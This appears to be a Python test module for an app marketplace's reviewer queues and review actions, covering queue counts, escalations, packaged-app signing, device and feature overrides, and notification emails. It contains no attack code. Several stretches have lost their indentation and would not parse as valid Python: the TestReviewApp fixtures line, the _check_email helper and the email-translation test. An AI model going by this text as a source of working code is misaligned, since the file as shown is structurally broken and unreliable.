        eq_(RereviewQueue.objects.filter(addon=app).exists(), False)
@mock.patch('versions.models.Version.is_privileged', False)
class TestUpdateQueue(AppReviewerTest, AccessMixin, FlagsMixin, SearchMixin,
                      XSSMixin):
    """Tests for the updates queue: public packaged apps with a newer
    pending version awaiting review."""
    fixtures = ['base/users']
    def setUp(self):
        # Two packaged apps, each with a public 1.0 and a pending 1.1.
        app1 = app_factory(is_packaged=True, name='XXX',
                           version_kw={'version': '1.0',
                                       'created': self.days_ago(2),
                                       'nomination': self.days_ago(2)})
        app2 = app_factory(is_packaged=True, name='YYY',
                           version_kw={'version': '1.0',
                                       'created': self.days_ago(2),
                                       'nomination': self.days_ago(2)})
        version_factory(addon=app1, version='1.1', created=self.days_ago(1),
                        nomination=self.days_ago(1),
                        file_kw={'status': amo.STATUS_PENDING})
        version_factory(addon=app2, version='1.1', created=self.days_ago(1),
                        nomination=self.days_ago(1),
                        file_kw={'status': amo.STATUS_PENDING})
        self.apps = list(Webapp.objects.order_by('id'))
        self.login_as_editor()
        self.url = reverse('reviewers.apps.queue_updates')
    def review_url(self, app):
        # Review-page URL for a given app.
        return reverse('reviewers.apps.review', args=[app.app_slug])
    def test_template_links(self):
        self.apps[0].versions.latest().update(nomination=self.days_ago(2))
        self.apps[1].versions.latest().update(nomination=self.days_ago(1))
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        links = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(2) a')
        expected = [
            (unicode(self.apps[0].name), self.review_url(self.apps[0])),
            (unicode(self.apps[1].name), self.review_url(self.apps[1])),
        ]
        check_links(expected, links, verify=False)
    def test_action_buttons_public_senior_reviewer(self):
        self.apps[0].versions.latest().files.update(status=amo.STATUS_PUBLIC)
        self.login_as_senior_reviewer()
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Reject', 'reject'),
            (u'Disable app', 'disable'),
            (u'Escalate', 'escalate'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    def test_action_buttons_public(self):
        self.apps[0].versions.latest().files.update(status=amo.STATUS_PUBLIC)
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Reject', 'reject'),
            (u'Escalate', 'escalate'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    def test_action_buttons_reject(self):
        self.apps[0].versions.latest().files.update(status=amo.STATUS_DISABLED)
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Push to public', 'public'),
            (u'Escalate', 'escalate'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    def test_invalid_page(self):
        # Out-of-range page numbers fall back to page 1.
        r = self.client.get(self.url, {'page': 999})
        eq_(r.status_code, 200)
        eq_(r.context['pager'].number, 1)
    def test_queue_count(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (2)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Moderated Reviews (0)')
    def test_queue_count_senior_reviewer(self):
        # Senior reviewers see an extra Escalations tab.
        self.login_as_senior_reviewer()
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (2)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (0)')
        eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
    def test_escalated_not_in_queue(self):
        self.login_as_senior_reviewer()
        EscalationQueue.objects.create(addon=self.apps[0])
        res = self.client.get(self.url)
        eq_([a.app for a in res.context['addons']], self.apps[1:])
        doc = pq(res.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (1)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (1)')
        eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
    def test_order(self):
        # Queue is ordered by latest-version nomination, not app creation.
        self.apps[0].update(created=self.days_ago(10))
        self.apps[1].update(created=self.days_ago(5))
        self.apps[0].versions.latest().update(nomination=self.days_ago(1))
        self.apps[1].versions.latest().update(nomination=self.days_ago(4))
        res = self.client.get(self.url)
        apps = list(res.context['addons'])
        eq_(apps[0].app, self.apps[1])
        eq_(apps[1].app, self.apps[0])
    def test_only_updates_in_queue(self):
        # Add new packaged app, which should only show up in the pending queue.
        app = app_factory(is_packaged=True, name='ZZZ',
                          status=amo.STATUS_PENDING,
                          version_kw={'version': '1.0'},
                          file_kw={'status': amo.STATUS_PENDING})
        res = self.client.get(self.url)
        apps = [a.app for a in res.context['addons']]
        assert app not in apps, (
            'Unexpected: Found a new packaged app in the updates queue.')
        eq_(pq(res.content)('.tabnav li a:eq(2)').text(), u'Updates (2)')
    def test_public_waiting_update_in_queue(self):
        # A PUBLIC_WAITING app with a pending update belongs in this queue.
        app = app_factory(is_packaged=True, name='YYY',
                          status=amo.STATUS_PUBLIC_WAITING,
                          version_kw={'version': '1.0',
                                      'created': self.days_ago(2),
                                      'nomination': self.days_ago(2)})
        File.objects.filter(version__addon=app).update(status=app.status)
        version_factory(addon=app, version='1.1', created=self.days_ago(1),
                        nomination=self.days_ago(1),
                        file_kw={'status': amo.STATUS_PENDING})
        res = self.client.get(self.url)
        apps = [a.app for a in res.context['addons']]
        assert app in apps
        eq_(pq(res.content)('.tabnav li a:eq(2)').text(), u'Updates (3)')
    def test_update_queue_with_empty_nomination(self):
        app = app_factory(is_packaged=True, name='YYY',
                          status=amo.STATUS_NULL,
                          version_kw={'version': '1.0',
                                      'created': self.days_ago(2),
                                      'nomination': None})
        first_version = app.latest_version
        version_factory(addon=app, version='1.1', created=self.days_ago(1),
                        nomination=None,
                        file_kw={'status': amo.STATUS_PENDING})
        # Now that we have a version with nomination=None, reset app status.
        app.update(status=amo.STATUS_PUBLIC_WAITING)
        File.objects.filter(version=first_version).update(status=app.status)
        # Safeguard: we /really/ want to test with nomination=None.
        eq_(app.latest_version.reload().nomination, None)
        res = self.client.get(self.url)
        apps = [a.app for a in res.context['addons']]
        assert app in apps
        eq_(pq(res.content)('.tabnav li a:eq(2)').text(), u'Updates (3)')
    def test_deleted_version_not_in_queue(self):
        """
        This tests that an app with a prior pending version that got
        deleted doesn't trigger the app to remain in the review queue.
        """
        app = self.apps[0]
        # File is PENDING and delete current version.
        old_ver = app.versions.order_by('id')[0]
        old_ver.files.latest().update(status=amo.STATUS_PENDING)
        old_ver.delete()
        # "Approve" the app.
        app.versions.latest().files.latest().update(status=amo.STATUS_PUBLIC)
        eq_(app.reload().status, amo.STATUS_PUBLIC)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        # Verify that our app has 2 versions.
        eq_(Version.with_deleted.filter(addon=app).count(), 2)
        # Verify the apps in the context are what we expect.
        doc = pq(res.content)
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (1)')
        apps = [a.app for a in res.context['addons']]
        ok_(app not in apps)
        ok_(self.apps[1] in apps)
class TestDeviceQueue(AppReviewerTest, AccessMixin):
    """Tests for the device queue, which filters apps by the reviewer's
    device feature profile ('pro' signature)."""
    fixtures = fixture('group_editor', 'user_editor', 'user_editor_group',
                       'user_999')
    def setUp(self):
        # app1 requires SMS, app2 requires MP3 -- so a profile supporting
        # only SMS must filter app2 out.
        self.app1 = app_factory(name='XXX',
                                version_kw={'version': '1.0',
                                            'created': self.days_ago(2),
                                            'nomination': self.days_ago(2)})
        self.app1.versions.latest().features.update(has_sms=True)
        self.app2 = app_factory(name='YYY',
                                version_kw={'version': '1.0',
                                            'created': self.days_ago(2),
                                            'nomination': self.days_ago(2)})
        self.app2.versions.latest().features.update(has_mp3=True)
        self.app1.update(status=amo.STATUS_PENDING)
        self.app2.update(status=amo.STATUS_PENDING)
        self.apps = list(Webapp.objects.order_by('id'))
        self.login_as_editor()
        self.url = reverse('reviewers.apps.queue_device')
    def test_no_queue_if_no_pro(self):
        # Without a 'pro' signature the device queue is empty and uncounted.
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        ok_('queue_device' not in res.context['queue_counts'])
        eq_(res.context['addons'], [])
    def test_queue_filters(self):
        "Test queue filters out apps we don't support."
        pro = FeatureProfile(sms=True).to_signature()
        res = self.client.get(self.url, {'pro': pro})
        eq_(res.status_code, 200)
        eq_(res.context['queue_counts']['device'], 1)
        apps = [a.app for a in res.context['addons']]
        ok_(self.app1 in apps)
        ok_(self.app2 not in apps)
@mock.patch('versions.models.Version.is_privileged', False)
class TestEscalationQueue(AppReviewerTest, AccessMixin, FlagsMixin,
                          SearchMixin, XSSMixin):
    """Tests for the escalations queue, visible to senior reviewers only."""
    fixtures = ['base/users']
    def setUp(self):
        # Three escalated apps with staggered queue-entry times (XXX oldest).
        self.apps = [app_factory(name='XXX'),
                     app_factory(name='YYY'),
                     app_factory(name='ZZZ')]
        EscalationQueue.objects.create(addon=self.apps[0]).update(
            created=self.days_ago(5))
        EscalationQueue.objects.create(addon=self.apps[1]).update(
            created=self.days_ago(3))
        EscalationQueue.objects.create(addon=self.apps[2]).update(
            created=self.days_ago(1))
        self.apps[0].update(created=self.days_ago(5))
        self.apps[1].update(created=self.days_ago(3))
        self.apps[2].update(created=self.days_ago(1))
        self.login_as_senior_reviewer()
        self.url = reverse('reviewers.apps.queue_escalated')
    def review_url(self, app):
        # Review-page URL for a given app.
        return reverse('reviewers.apps.review', args=[app.app_slug])
    def test_flag_blocked(self):
        # Blocklisted apps should only be in the update queue, so this flag
        # check is here rather than in FlagsMixin.
        self.apps[0].update(status=amo.STATUS_BLOCKED)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        tds = pq(res.content)('#addon-queue tbody tr td.flags')
        flags = tds('div.sprite-reviewer-blocked')
        eq_(flags.length, 1)
    def test_no_access_regular_reviewer(self):
        # Since setUp added a new group, remove all groups and start over.
        user = UserProfile.objects.get(email='[email protected]')
        GroupUser.objects.filter(user=user).delete()
        self.grant_permission(user, 'Apps:Review')
        res = self.client.get(self.url)
        eq_(res.status_code, 403)
    def test_template_links(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        links = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(2) a')
        apps = [rq.addon for rq in
                EscalationQueue.objects.all().order_by('addon__created')]
        expected = [
            (unicode(apps[0].name), self.review_url(apps[0])),
            (unicode(apps[1].name), self.review_url(apps[1])),
            (unicode(apps[2].name), self.review_url(apps[2])),
        ]
        check_links(expected, links, verify=False)
    def test_waiting_time(self):
        """Check objects show queue objects' created."""
        r = self.client.get(self.url)
        waiting_times = [wait.attrib['isotime'] for wait in
                         pq(r.content)('td time')]
        expected_waiting_times = [
            isotime(app.escalationqueue_set.all()[0].created)
            for app in self.apps]
        self.assertSetEqual(expected_waiting_times, waiting_times)
    def test_action_buttons_public(self):
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Reject', 'reject'),
            (u'Disable app', 'disable'),
            (u'Clear Escalation', 'clear_escalation'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    def test_action_buttons_reject(self):
        self.apps[0].update(status=amo.STATUS_REJECTED)
        self.apps[0].latest_version.files.update(status=amo.STATUS_DISABLED)
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Push to public', 'public'),
            (u'Disable app', 'disable'),
            (u'Clear Escalation', 'clear_escalation'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    def test_invalid_page(self):
        # Out-of-range page numbers fall back to page 1.
        r = self.client.get(self.url, {'page': 999})
        eq_(r.status_code, 200)
        eq_(r.context['pager'].number, 1)
    def test_queue_count(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (3)')
        eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
    def test_abuse(self):
        # Abuse-report counts show in the 7th column.
        AbuseReport.objects.create(addon=self.apps[0], message='!@#$')
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        tds = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(7)')
        eq_(tds.eq(0).text(), '1')
    def test_addon_deleted(self):
        # Deleting an app must drop its escalation queue entry.
        app = self.apps[0]
        app.delete()
        eq_(EscalationQueue.objects.filter(addon=app).exists(), False)
class TestReviewTransaction(AttachmentManagementMixin, amo.tests.MockEsMixin,
                            amo.tests.MockBrowserIdMixin,
                            amo.tests.test_utils.TransactionTestCase):
    """Transaction-level tests: approving a packaged app signs it, and a
    signing failure must leave the app's status unchanged.  Uses
    TransactionTestCase so real commit/rollback behavior is exercised."""
    fixtures = fixture('group_editor', 'user_editor', 'user_editor_group',
                       'webapp_337141')
    def setUp(self):
        super(TestReviewTransaction, self).setUp()
        self.mock_browser_id()
    def get_app(self):
        # no_cache() so every call re-reads status from the database.
        return Webapp.objects.no_cache().get(id=337141)
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    @mock.patch('lib.crypto.packaged.sign_app')
    def test_public_sign(self, sign_mock, json_mock, update_cached_manifests):
        self.app = self.get_app()
        self.app.update(status=amo.STATUS_PENDING, is_packaged=True)
        self.version = self.app.current_version
        self.version.files.all().update(status=amo.STATUS_PENDING)
        eq_(self.get_app().status, amo.STATUS_PENDING)
        sign_mock.return_value = None  # Didn't fail.
        json_mock.return_value = {'name': 'Something'}
        assert self.client.login(username='[email protected]',
                                 password='password')
        data = {'action': 'public', 'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        resp = self.client.post(
            reverse('reviewers.apps.review', args=[self.app.app_slug]),
            data)
        eq_(resp.status_code, 302)
        # Successful signing publishes the app and refreshes its manifest.
        eq_(self.get_app().status, amo.STATUS_PUBLIC)
        eq_(update_cached_manifests.delay.call_count, 1)
    @mock.patch('lib.crypto.packaged.sign_app')
    def test_public_sign_failure(self, sign_mock):
        # Test fails only on Jenkins, so skipping when run there for now.
        if os.environ.get('JENKINS_HOME'):
            raise SkipTest()
        self.app = self.get_app()
        self.app.update(status=amo.STATUS_PENDING, is_packaged=True)
        self.version = self.app.current_version
        self.version.files.all().update(status=amo.STATUS_PENDING)
        # Test fails on Jenkins on the line below; status is STATUS_PUBLIC.
        eq_(self.get_app().status, amo.STATUS_PENDING)
        sign_mock.side_effect = packaged.SigningError('Bad things happened.')
        assert self.client.login(username='[email protected]',
                                 password='password')
        data = {'action': 'public', 'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        resp = self.client.post(
            reverse('reviewers.apps.review', args=[self.app.app_slug]), data)
        eq_(resp.status_code, 302)
        # Signing failed, so the app must still be pending (rolled back).
        eq_(self.get_app().status, amo.STATUS_PENDING)
class TestReviewApp(AppReviewerTest, AccessMixin, AttachmentManagementMixin,
PackagedFilesMixin):
fixtures = ['base/platforms', 'base/users'] + fixture('webapp_337141')
    def setUp(self):
        """Put fixture app 337141 into the pending queue as a 'game' app
        with a mozilla_contact set, and cache the review URL."""
        super(TestReviewApp, self).setUp()
        self.create_switch('iarc', db=True)
        self.mozilla_contact = '[email protected]'
        self.app = self.get_app()
        self.app = amo.tests.make_game(self.app, True)
        self.app.update(status=amo.STATUS_PENDING,
                        mozilla_contact=self.mozilla_contact)
        self.version = self.app.current_version
        self.version.files.all().update(status=amo.STATUS_PENDING)
        self.url = reverse('reviewers.apps.review', args=[self.app.app_slug])
        self.file = self.version.all_files[0]
        self.setup_files()
    def get_app(self):
        """Fetch a fresh copy of the fixture webapp from the database."""
        return Webapp.objects.get(id=337141)
    def post(self, data, queue='pending'):
        """POST the review form and assert a redirect back to the given
        reviewer queue page."""
        res = self.client.post(self.url, data)
        self.assert3xx(res, reverse('reviewers.apps.queue_%s' % queue))
    def test_review_viewing_ping(self):
        """The 'review viewing' heartbeat endpoint responds 200."""
        eq_(self.client.post(reverse('editors.review_viewing')).status_code,
            200)
    @mock.patch('mkt.webapps.models.Webapp.in_rereview_queue')
    def test_rereview(self, is_rereview_queue):
        """Apps in the re-review queue show the #queue-rereview banner."""
        is_rereview_queue.return_value = True
        content = pq(self.client.get(self.url).content)
        assert content('#queue-rereview').length
    @mock.patch('mkt.webapps.models.Webapp.in_escalation_queue')
    def test_escalated(self, in_escalation_queue):
        """Apps in the escalation queue show the #queue-escalation banner."""
        in_escalation_queue.return_value = True
        content = pq(self.client.get(self.url).content)
        assert content('#queue-escalation').length
    def test_cannot_review_my_app(self):
        """A reviewer who authored the app is bounced to the reviewers home
        page (when self-reviews are disabled) for both GET and POST."""
        with self.settings(ALLOW_SELF_REVIEWS=False):
            self.app.addonuser_set.create(
                user=UserProfile.objects.get(username='editor'))
            res = self.client.head(self.url)
            self.assert3xx(res, reverse('reviewers.home'))
            res = self.client.post(self.url)
            self.assert3xx(res, reverse('reviewers.home'))
    def test_cannot_review_blocklisted_app(self):
        """Regular reviewers are redirected away from blocklisted apps."""
        self.app.update(status=amo.STATUS_BLOCKED)
        res = self.client.get(self.url)
        self.assert3xx(res, reverse('reviewers.home'))
        res = self.client.post(self.url)
        self.assert3xx(res, reverse('reviewers.home'))
    def test_review_no_latest_version(self):
        """With all versions deleted the review page still renders, offering
        only the info/comment actions (no approve/reject)."""
        self.app.versions.all().delete()
        self.app.reload()
        eq_(self.app.latest_version, None)
        eq_(self.app.current_version, None)
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        doc = pq(response.content)
        assert doc('input[name=action][value=info]').length
        assert doc('input[name=action][value=comment]').length
        assert not doc('input[name=action][value=public]').length
        assert not doc('input[name=action][value=reject]').length
        # Also try with a packaged app.
        self.app.update(is_packaged=True)
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
    def test_sr_can_review_blocklisted_app(self):
        """Senior reviewers can open and process a blocklisted app."""
        self.app.update(status=amo.STATUS_BLOCKED)
        self.login_as_senior_reviewer()
        eq_(self.client.get(self.url).status_code, 200)
        data = {'action': 'public', 'comments': 'yo'}
        data.update(self._attachment_management_form(num=0))
        res = self.client.post(self.url, data)
        self.assert3xx(res, reverse('reviewers.apps.queue_pending'))
def _check_email(self, msg, subject, with_mozilla_contact=True):
eq_(msg.to, list(self.app.authors.values_list('email', flat=True)))
moz_contacts = [u'']
if with_mozilla_contact and self.mozilla_contact:
moz_contacts = [x.strip()
for x in self.mozilla_contact.split(u',')]
eq_(msg.cc, moz_contacts)
eq_(msg.subject, '%s: %s' % (subject, self.app.name))
eq_(msg.from_email, settings.MKT_REVIEWERS_EMAIL)
eq_(msg.extra_headers['Reply-To'], settings.MKT_REVIEWERS_EMAIL)
    def _check_thread(self):
        """Assert exactly one communication thread exists for the app and is
        readable by developer, reviewer and staff."""
        thread = self.app.threads
        eq_(thread.count(), 1)
        thread = thread.get()
        perms = ('developer', 'reviewer', 'staff')
        for key in perms:
            assert getattr(thread, 'read_permission_%s' % key)
    def _check_admin_email(self, msg, subject):
        """Assert `msg` is the senior-editors notification with the expected
        subject and reviewer From/Reply-To addresses."""
        eq_(msg.to, [settings.MKT_SENIOR_EDITORS_EMAIL])
        eq_(msg.subject, '%s: %s' % (subject, self.app.name))
        eq_(msg.from_email, settings.MKT_REVIEWERS_EMAIL)
        eq_(msg.extra_headers['Reply-To'], settings.MKT_REVIEWERS_EMAIL)
    def _check_email_body(self, msg):
        """Assert the email body links back to the app's detail page."""
        body = msg.message().as_string()
        url = self.app.get_url_path(add_prefix=False)
        assert url in body, 'Could not find apps detail URL in %s' % msg
    def _check_log(self, action):
        """Assert an AppLog entry with the given activity action exists."""
        assert AppLog.objects.filter(
            addon=self.app, activity_log__action=action.id).exists(), (
                "Didn't find `%s` action in logs." % action.short)
    def _check_score(self, reviewed_type):
        """Assert a ReviewerScore of the given type (and matching point
        value) was awarded."""
        scores = ReviewerScore.objects.all()
        assert len(scores) > 0
        eq_(scores[0].score, amo.REVIEWED_SCORES[reviewed_type])
        eq_(scores[0].note_key, reviewed_type)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    def test_pending_to_public_w_device_overrides(self, storefront_mock):
        """Approving with a device override narrows the device list, puts
        the app into public-waiting (not immediately public), and logs the
        override action."""
        AddonDeviceType.objects.create(addon=self.app,
                                       device_type=amo.DEVICE_DESKTOP.id)
        AddonDeviceType.objects.create(addon=self.app,
                                       device_type=amo.DEVICE_TABLET.id)
        eq_(self.app.make_public, amo.PUBLIC_IMMEDIATELY)
        data = {'action': 'public', 'device_types': '', 'browsers': '',
                'comments': 'something',
                'device_override': [amo.DEVICE_DESKTOP.id]}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        app = self.get_app()
        eq_(app.make_public, amo.PUBLIC_WAIT)
        eq_(app.status, amo.STATUS_PUBLIC_WAITING)
        eq_([o.id for o in app.device_types], [amo.DEVICE_DESKTOP.id])
        self._check_log(amo.LOG.REVIEW_DEVICE_OVERRIDE)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'App approved but waiting')
        self._check_email_body(msg)
        # Not public yet, so no IARC storefront push.
        assert not storefront_mock.called
    def test_pending_to_reject_w_device_overrides(self):
        """Rejecting must ignore any device_override sent with the form:
        the app's device list stays unchanged."""
        # This shouldn't be possible unless there's form hacking.
        AddonDeviceType.objects.create(addon=self.app,
                                       device_type=amo.DEVICE_DESKTOP.id)
        AddonDeviceType.objects.create(addon=self.app,
                                       device_type=amo.DEVICE_TABLET.id)
        eq_(self.app.make_public, amo.PUBLIC_IMMEDIATELY)
        data = {'action': 'reject', 'device_types': '', 'browsers': '',
                'comments': 'something',
                'device_override': [amo.DEVICE_DESKTOP.id]}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        app = self.get_app()
        eq_(app.make_public, amo.PUBLIC_IMMEDIATELY)
        eq_(app.status, amo.STATUS_REJECTED)
        eq_(set([o.id for o in app.device_types]),
            set([amo.DEVICE_DESKTOP.id, amo.DEVICE_TABLET.id]))
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'Your submission has been rejected')
        self._check_email_body(msg)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    def test_pending_to_public_w_requirements_overrides(self, storefront_mock):
        """A reviewer overriding feature requirements on approval sets the
        feature flag, logs the override, and does NOT trigger a re-review."""
        data = {'action': 'public', 'comments': 'something',
                'has_sms': True}
        data.update(self._attachment_management_form(num=0))
        assert not self.app.current_version.features.has_sms
        self.post(data)
        app = self.get_app()
        assert app.current_version.features.has_sms
        eq_(app.make_public, amo.PUBLIC_WAIT)
        eq_(app.status, amo.STATUS_PUBLIC_WAITING)
        self._check_log(amo.LOG.REVIEW_FEATURES_OVERRIDE)
        # A reviewer changing features shouldn't generate a re-review.
        eq_(RereviewQueue.objects.count(), 0)
        assert not storefront_mock.called
    def test_pending_to_reject_w_requirements_overrides(self):
        """Feature-requirement overrides sent with a rejection are ignored."""
        # Rejecting an app doesn't let you override features requirements.
        data = {'action': 'reject', 'comments': 'something',
                'has_sms': True}
        data.update(self._attachment_management_form(num=0))
        assert not self.app.latest_version.features.has_sms
        self.post(data)
        app = self.get_app()
        eq_(app.make_public, amo.PUBLIC_IMMEDIATELY)
        eq_(app.status, amo.STATUS_REJECTED)
        assert not app.latest_version.features.has_sms
    def test_pending_to_reject_w_requirements_overrides_nothing_changed(self):
        """Approving with feature values identical to the stored ones must
        not log a features-override action.
        NOTE(review): despite the 'to_reject' in the name, this posts
        action='public' — the name looks like a copy-paste leftover; confirm
        before renaming."""
        self.version.features.update(has_sms=True)
        data = {'action': 'public', 'comments': 'something',
                'has_sms': True}
        data.update(self._attachment_management_form(num=0))
        assert self.app.latest_version.features.has_sms
        self.post(data)
        app = self.get_app()
        assert app.latest_version.features.has_sms
        eq_(app.make_public, None)
        eq_(app.status, amo.STATUS_PUBLIC)
        action_id = amo.LOG.REVIEW_FEATURES_OVERRIDE.id
        assert not AppLog.objects.filter(
            addon=self.app, activity_log__action=action_id).exists()
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.reviewers.views.messages.success')
    @mock.patch('mkt.webapps.tasks.index_webapps')
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
    @mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
    def test_pending_to_public(self, update_name, update_locales,
                               update_cached_manifests,
                               index_webapps, messages, storefront_mock):
        """Happy path: approving a pending hosted app makes it public,
        notifies the developer, awards reviewer points, reindexes, and skips
        the packaged-only manifest-cache refresh."""
        index_webapps.delay.reset_mock()
        eq_(update_name.call_count, 0)
        eq_(update_locales.call_count, 0)
        eq_(update_cached_manifests.delay.call_count, 0)
        eq_(storefront_mock.call_count, 0)
        data = {'action': 'public', 'device_types': '', 'browsers': '',
                'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        app = self.get_app()
        eq_(app.status, amo.STATUS_PUBLIC)
        eq_(app.current_version.files.all()[0].status, amo.STATUS_PUBLIC)
        self._check_log(amo.LOG.APPROVE_VERSION)
        eq_(len(mail.outbox), 1)
        msg = mail.outbox[0]
        self._check_email(msg, 'App approved')
        self._check_email_body(msg)
        self._check_score(amo.REVIEWED_WEBAPP_HOSTED)
        eq_(messages.call_args_list[0][0][1],
            '"Web App Review" successfully processed (+60 points, 60 total).')
        eq_(update_name.call_count, 1)
        eq_(update_locales.call_count, 1)
        eq_(index_webapps.delay.call_count, 1)
        # App is not packaged, no need to call update_cached_manifests.
        eq_(update_cached_manifests.delay.call_count, 0)
        eq_(storefront_mock.call_count, 1)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.reviewers.views.messages.success')
    @mock.patch('mkt.webapps.tasks.index_webapps')
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
    @mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
    def test_pending_to_public_notification_translation(self, update_name,
            update_locales, update_cached_manifests, index_webapps, messages,
            storefront_mock):
        """The reviewer-facing success message is localized to the request's
        Accept-Language (Spanish here)."""
        data = {'action': 'public', 'device_types': '', 'browsers': '',
                'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.client.post(self.url, data, HTTP_ACCEPT_LANGUAGE='es')
        eq_(messages.call_args_list[0][0][1],
            u'"Valoración de la aplicación web" successfully processed '
            u'(+60 points, 60 total).')
    # NOTE(review): `new=mock.Mock` patches with the Mock *class*, not an
    # instance (`mock.Mock()`); calling it still works, but the instance
    # form is the conventional usage — confirm intent.
    @mock.patch('mkt.reviewers.views.messages.success', new=mock.Mock)
    def test_incomplete_cant_approve(self):
        """Approving an incomplete (STATUS_NULL) app is a no-op."""
        self.app.update(status=amo.STATUS_NULL)
        self.app.latest_version.files.update(status=amo.STATUS_NULL)
        data = {'action': 'public', 'comments': 'something'}
        data.update(self._attachment_management_form(num=0))
        self.post(data)
        # Still incomplete.
        eq_(self.get_app().status, amo.STATUS_NULL)
def test_notification_email_translation(self):
"""Test that the app name is translated with the app's default_locale
and not the reviewer's when we are sending notification emails."""
original_name = unicode(self.app.name)
fr_translation = u'Mais allô quoi!'
es_translation = u'¿Dónde está la biblioteca?'
self.app.name = {
'fr': fr_translation,
'es': es_translation,
}
self.app.default_locale = 'fr'
self.app.save()
data = {'action': 'public', 'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.client.post(self.url, data, HTTP_ACCEPT_LANGUAGE='es')
eq_(translation.get_language(), 'es')
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
assert not original_name in msg.subject
assert not es_translation in msg.subject
assert fr_translation in msg.subject
assert not original_name in msg.body
assert not es_translation in msg.body
assert fr_translation in msg.body
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.tasks.index_webapps')
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
    @mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
    @mock.patch('lib.crypto.packaged.sign')
    def test_approve_packaged_app(self, sign_mock, update_name,
            update_locales, update_cached_manifests, index_webapps,
            storefront_mock):
        """Approving a packaged app signs the current version and refreshes
        cached manifests (unlike the hosted-app path)."""
        self.get_app().update(is_packaged=True)
        index_webapps.delay.reset_mock()
        eq_(sign_mock.call_count, 0)
        eq_(update_name.call_count, 0)
        eq_(update_locales.call_count, 0)
        eq_(update_cached_manifests.delay.call_count, 0)
        eq_(storefront_mock.call_count, 0)
